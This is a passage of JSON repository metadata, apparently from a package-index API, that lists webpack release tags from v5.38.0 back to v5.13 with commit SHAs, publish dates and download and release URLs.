ublished_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13